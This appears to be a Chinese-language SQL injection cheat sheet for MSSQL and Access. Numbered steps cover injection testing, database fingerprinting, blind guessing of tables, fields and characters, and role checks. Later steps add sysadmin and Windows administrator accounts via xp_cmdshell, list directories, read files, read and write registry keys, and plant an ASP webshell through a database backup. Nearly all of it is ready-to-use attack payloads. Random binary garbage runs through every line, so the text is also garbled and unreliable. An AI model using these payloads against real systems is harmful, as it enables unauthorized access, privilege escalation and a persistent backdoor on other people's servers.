1.判断是否有注入;and 1=1 ;and 1=2 ��%N�xNZ�e
2.初步判断是否是mssql ;and user>0 Tz�X>d�<x�
�:Z1_;`>CT
3.注入参数是字符'and [查询条件] and ''=' F�V�F:�1DT
-4GSGR'L&y
4.搜索时没过滤参数的'and [查询条件] and '%25'=' )Ojb�mU!7
q{KRM\ooYs
5.判断数据库系统 ��u4�5e>F=
�B_}=v��$�
;and (select count(*) from sysobjects)>0 mssql �8U\ +b�?}
_KD(V2�W��
;and (select count(*) from msysobjects)>0 access �m�v30x�cc
~Bu~?ZJm�d
0}��P&G^%"
Uv�%�"45&7
6.猜数据库 ;and (select Count(*) from [数据库名])>0 -U;�s,�>\)
:��()4eK/\
7.猜字段 ;and (select Count(字段名) from 数据库名)>0 +Pa!pj/< z
���h�i�.{�
8.猜字段中记录长度 ;and (select top 1 len(字段名) from 数据库名)>0 �w8@MUz}/#
F}.A�f�=<Q
9.(1)猜字段的ascii值(access) yChC&kX
Z+
Z�c%S`zK`7
;and (select top 1 asc(mid(字段名,1,1)) from 数据库名)>0 �n��NQ\r�O
's&V�g09D,
(2)猜字段的ascii值(mssql) R@�"N�{ [9
&s]
s]��V)
;and (select top 1 unicode(substring(字段名,1,1)) from 数据库名)>0 y{jv-&!�xB
tP3H7Yl!�g
10.测试权限结构(mssql) �X�P{ nf9&
�tgrQ$Yjk
%*jpQO��w
�<`M�Hra�8
;and 1=(select IS_SRVROLEMEMBER('sysadmin'));-- ]J��ht��O{
^g~-$�t�<!
;and 1=(select IS_SRVROLEMEMBER('serveradmin'));-- q*'hSt�@+D
*w@>zkB�l�
;and 1=(select IS_SRVROLEMEMBER('setupadmin'));-- �A�= ��,q&
`w~ 9/s�ty
;and 1=(select IS_SRVROLEMEMBER('securityadmin'));-- �Og��Ou$�.
�S�b,{+�Wk
;and 1=(select IS_SRVROLEMEMBER('diskadmin'));-- TFM�}��P
*[vf47)r!�
;and 1=(select IS_SRVROLEMEMBER('bulkadmin'));-- '{7A1yJnY%
nLQ X?���:
;and 1=(select IS_MEMBER('db_owner'));-- �m{V���@Om
|
sQ5`lV?�
-Mv`|od�Y/
Z2���
t0l%
11.添加mssql和系统的帐户 $@K�+yOq+u
9_�T�Z�;�e
;exec master.dbo.sp_addlogin username;-- ("�{AY�?{{
;exec master.dbo.sp_password null,username,password;-- Tm�Q2;3�%
-�i��J[9O
;exec master.dbo.sp_addsrvrolemember sysadmin username;-- pq�4+�n'uO
�u
�|f h!-
;exec master.dbo.xp_cmdshell 'net user username password _ H�@pYMNH
OZIS��h��?
/workstations:*/times:all/passwordchg:yes /passwordreq:yes /active:yes /add';-- ZZe�qOu�7^
L8Z�CGW\Rr
;exec master.dbo.xp_cmdshell 'net user username password /add';-- 3mBr�nq]j>
�
Ye�m�OP9
;exec master.dbo.xp_cmdshell 'net localgroup administrators username /add';-- �w�ef�QmRK
�8:0�l5cZE
<:�%I�q13D
���nbOM�tK
12.(1)遍历目录
�-�����6�
E^|�b3G6T�
;create table dirs(paths varchar(100), id int) vn
kk�tD'n
x^C,xP[#Y;
;insert dirs exec master.dbo.xp_dirtree 'c:\' .Q?AzU�,2D
j�.�m�-6��
;and (select top 1 paths from dirs)>0 b���%v1]a[
I�i4�Byyfx
;and (select top 1 paths from dirs where paths not in('上步得到的paths'))>) �\x�|(`;�{
;Y)��?6^�"
0�|��Nb�U�
t��[�^}/
S
(2)遍历目录 �DVC�c^5�#
`T�~M:\^D�
;create table temp(id nvarchar(255),num1 nvarchar(255),num2 nvarchar(255),num3 nvarchar(255));-- �*1>XlVx�,
;insert temp exec master.dbo.xp_availablemedia;-- 获得当前所有驱动器 Bp4QHv9xqL
�-`Z5#�8P�
;insert into temp(id) exec master.dbo.xp_subdirs 'c:\';-- 获得子目录列表 S"}FsS;k<?
l�~uR��ZLx
;insert into temp(id,num1) exec master.dbo.xp_dirtree 'c:\';-- 获得所有子目录的目录树构 O81})r�*Y�
-@�i2]��o�
;insert into temp(id) exec master.dbo.xp_cmdshell 'type c:\web\index.asp';-- 查看文件的内容 N"2�@y��aN
c| p
eR�O.
!H.&"�~w@�
|7f}icXKur
13.mssql中的存储过程 9{>m04888�
l�
"d&Sgnj
xp_regenumvalues 注册表根键, 子键 H:0�-.a^ZS
rl6v�t*�g�
;exec xp_regenumvalues 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows\CurrentVersion\Run' 以多个记录集方式返回所有键值 i�{���%~&!
�/#Ew{RvW'
xp_regread 根键,子键,键值名 �o�'y�R^`�
YF���."D%?
;exec xp_regread ;E#�#bdSCA
iv5��6zsR
'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows\CurrentVersion','CommonFilesDir' 返回制定键的值 g fO.Ky��6
�/'ybl�^Km
xp_regwrite 根键,子键, 值名, 值类型, 值 W]r�Xt,{�&
Imv�kB~8N
值类型有2种REG_SZ 表示字符型,REG_DWORD 表示整型 E�JL45R�>�
i?m�DR$X:�
;exec xp_regwrite 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows\CurrentVersion','TestValueName','reg_sz','hello' 写入注册表 b7"pm)6���
�t�CA �|sN
xp_regdeletevalue 根键,子键,值名 $`]<�4I9d�
hBN!!a|�l
exec xp_regdeletevalue 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows\CurrentVersion','TestValueName' 删除某个值 '�kYV}rq;l
m6g+ B���>
xp_regdeletekey 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows\CurrentVersion\Testkey' 删除键,包括该键下所有值 �}3N8E��mS
NO�6�.�qWl
(��VC_�vz-
*Z{W,8h*�s
14.mssql的backup创建webshell )zr�/9��aV
U,g!�K�N3P
use model rWa7"<`�p�
EmY8AN(�*
create table cmd(str image); Vs�UE�p�_I
��%��_A1WC
insert into cmd(str) values (''); +I�JpqF�H�
��GK\'m�@k
backup database model to disk='c:\l.asp'; V1j&>-]]9*
R�y/�NfF=�
��&V�l,x/
B?TA��S�
15.mssql内置函数 0M�PsF{Xw[
)vy<q/o�+�
;and (select @@version)>0 获得Windows的版本号 �~\��X�B'�
�<pi q?:ac
;and user_name()='dbo' 判断当前系统的连接用户是不是sa 93YD\R+��q
�J'2R-C�I,
;and (select user_name())>0 爆当前系统的连接用户 ���Y�a=QN<
~�ocd4,d�=
;and (select db_name())>0 得到当前连接的数据库 hW�/*]7AM^
z.[L1AGa|s
H&%=>�hyX�
Bt�.W���_p
16.简洁的webshell l:faI&�o.@
7N'F�]��x�
use model �sU�{+.�k{
E��\�'�_`L
create table cmd(str image); ��)rj.WK�.
`cZG&�R�
insert into cmd(str) values (''); ���tkJ/�h<
R]ppA=1*_l
backup database model to disk='g:\wwwtest\l.asp';
